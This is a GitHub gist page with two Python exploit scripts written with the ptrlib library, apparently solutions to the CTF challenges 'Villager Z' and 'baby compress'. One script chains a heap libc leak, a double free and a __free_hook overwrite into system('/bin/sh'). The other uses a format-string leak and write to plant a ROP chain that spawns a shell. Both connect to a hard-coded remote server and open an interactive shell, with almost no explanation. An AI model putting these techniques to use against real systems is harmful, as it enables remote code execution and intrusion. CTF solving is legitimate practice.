Skip to content

Instantly share code, notes, and snippets.

@ptr-yudai

ptr-yudai/exploit_bc.py

Last active July 24, 2020 07:54
Show Gist options
  • Save ptr-yudai/7604ba0064a870886fb775d11dc33cb8 to your computer and use it in GitHub Desktop.
Save ptr-yudai/7604ba0064a870886fb775d11dc33cb8 to your computer and use it in GitHub Desktop.
Download ZIP
Villager Zとbaby compressを解くやつ
Raw
exploit_bc.py
from ptrlib import *
def add(index, data):
sock.sendlineafter("> ", "1")
sock.sendlineafter(": ", str(index))
sock.sendlineafter(": ", data)
def show(index):
sock.sendlineafter("> ", "5")
sock.sendlineafter(": ", str(index))
length = int(sock.recvlineafter(": "))
content = sock.recvlineafter(": ")
return length, content
def delete(index):
sock.sendlineafter("> ", "4")
sock.sendlineafter(": ", str(index))
def compress(index):
sock.sendlineafter("> ", "2")
sock.sendlineafter(": ", str(index))
def decompress(index):
sock.sendlineafter("> ", "3")
sock.sendlineafter(": ", str(index))
libc = ELF("./libc.so.6")
#sock = Socket("localhost", 9999)
sock = Socket("123.216.69.60", 4445)
add(0, "01234567abcd" + "\x31"*4) # 0x431
add(1, "A")
add(2, "B" * 0x1c8 + "\x21")
add(3, "C" * 0x40)
add(4, "D" * 0x80)
compress(0)
delete(1)
# libc leak
add(5, "E" * 0x20)
add(6, "F" * 0x30)
add(7, "G" * 0x20)
libc_base = u64(show(4)[1]) - libc.main_arena() - 0x60
logger.info("libc = " + hex(libc_base))
# overlap killer
add(8, "1" * 0x20)
add(9, "2" * 0x20)
delete(8)
delete(8)
delete(9)
delete(8)
delete(1)
add(1, p64(libc_base + libc.symbol("__free_hook") - 10) + b"3" * 0x18)
add(8, "4" * 0x20)
add(2, b'///bin/sh\0' + p64(libc_base + libc.symbol("system")) * 3)
sock.interactive()
Raw
exploit_vz.py
from ptrlib import *
libc = ELF("./libc.so.6")
while True:
#sock = Socket("localhost", 9999)
sock = Socket("123.216.69.60", 4448)
# address leak
payload = '%1${}c%{}$hhn%{}$p.%{}$p'.format(0xa1, 0x1d + 6, 0x25 + 6, 0x22 + 6)
payload += 'A' * (0xe8 - len(payload))
#payload += '\x68'
payload += '\x88'
sock.recvline()
sock.send(payload)
r = sock.recvregex("0x([0-9a-f]+)\.0x([0-9a-f]+)")
libc_base = int(r[0], 16) - libc.symbol("__libc_start_main") - 0xf3
addr_stack = int(r[1], 16)
logger.info("libc = " + hex(libc_base))
logger.info("stack = " + hex(addr_stack))
if addr_stack % 0x100 != 0x90:
logger.warn("Bad luck!")
continue
# get shell
rop_ret = 0x00026b73
rop_pop_rdi = 0x00026b72
payload = fsb(
writes = {
addr_stack + 0x08: libc_base + rop_ret,
addr_stack + 0x10: libc_base + rop_pop_rdi,
addr_stack + 0x18: libc_base + next(libc.find("/bin/sh")),
addr_stack + 0x20: libc_base + libc.symbol("system"),
},
pos = 6,
bs = 2,
size = 6,
bits = 64
)
sock.recvuntil("What your name?\n")
logger.info("Good luck!")
sock.send(payload)
sock.recv(0x78009)
sock.interactive()
break
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment